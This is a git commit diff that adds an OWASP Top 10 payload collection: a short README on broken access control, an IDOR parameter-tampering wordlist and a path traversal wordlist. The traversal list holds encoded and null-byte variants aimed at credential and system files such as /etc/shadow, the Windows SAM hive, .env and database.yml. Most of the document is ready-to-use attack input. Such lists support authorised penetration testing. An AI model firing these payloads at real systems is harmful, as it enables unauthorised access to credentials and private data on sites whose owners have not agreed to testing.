Add comprehensive OWASP Top 10 directory structure with injection payloads

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

OWASP-Top-10/A01-Broken-Access-Control/README.md

@@ -0,0 +1,14 @@
+# A01 - Broken Access Control
+
+## Description
+Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside the user's limits.
+
+## Common Vulnerabilities
+- Path Traversal
+- IDOR (Insecure Direct Object References)
+- Missing Function Level Access Control
+- Forced Browsing
+- Privilege Escalation
+
+## Testing Approach
+Test for access control by manipulating URLs, parameters, and attempting to access resources without proper authorization.

OWASP-Top-10/A01-Broken-Access-Control/idor-payloads.txt

@@ -0,0 +1,40 @@
+# IDOR (Insecure Direct Object Reference) Payloads
+
+# Sequential ID manipulation
+?id=1
+?id=2
+?id=100
+?id=1000
+
+# UUID manipulation
+?user_id=00000000-0000-0000-0000-000000000001
+?user_id=11111111-1111-1111-1111-111111111111
+
+# Username/email enumeration
+?user=admin
+?user=administrator
+?user=root
+?email=admin@example.com
+?username=test
+
+# File/Document IDs
+?file_id=1
+?doc_id=1
+?document=private.pdf
+?report_id=1
+
+# Account/Profile manipulation
+?account_id=1
+?profile_id=1
+?customer_id=1
+
+# Negative and special values
+?id=-1
+?id=0
+?id=999999
+?id=null
+?id=undefined
+
+# Array/Multiple IDs
+?id[]=1&id[]=2
+?ids=1,2,3

OWASP-Top-10/A01-Broken-Access-Control/path-traversal-payloads.txt

@@ -0,0 +1,57 @@
+# Path Traversal Payloads
+
+# Basic traversal
+../
+../../
+../../../
+../../../../
+../../../../../
+../../../../../../
+../../../../../../../
+
+# URL encoded
+..%2F
+..%2F..%2F
+..%2F..%2F..%2F
+..%252f
+..%252f..%252f
+
+# Double URL encoded
+..%252F
+..%252F..%252F
+..%c0%af
+..%c1%9c
+
+# Windows paths
+..\
+..\..\
+..\..\..\
+..%5C
+..%5C..%5C
+..%255C
+
+# Null byte injection
+../../../etc/passwd%00
+../../../etc/passwd%00.jpg
+..%2F..%2F..%2Fetc%2Fpasswd%00
+
+# Common target files
+../../../etc/passwd
+../../../etc/shadow
+../../../etc/hosts
+../../../windows/system32/config/sam
+../../../windows/win.ini
+../../../boot.ini
+..\..\..\..\windows\system.ini
+
+# Web server files
+../../../var/www/html/index.php
+../../../usr/local/apache/conf/httpd.conf
+../../../etc/httpd/conf/httpd.conf
+../../../etc/nginx/nginx.conf
+
+# Application files
+../../../config/database.yml
+../../../.env
+../../../web.config
+../../../application.properties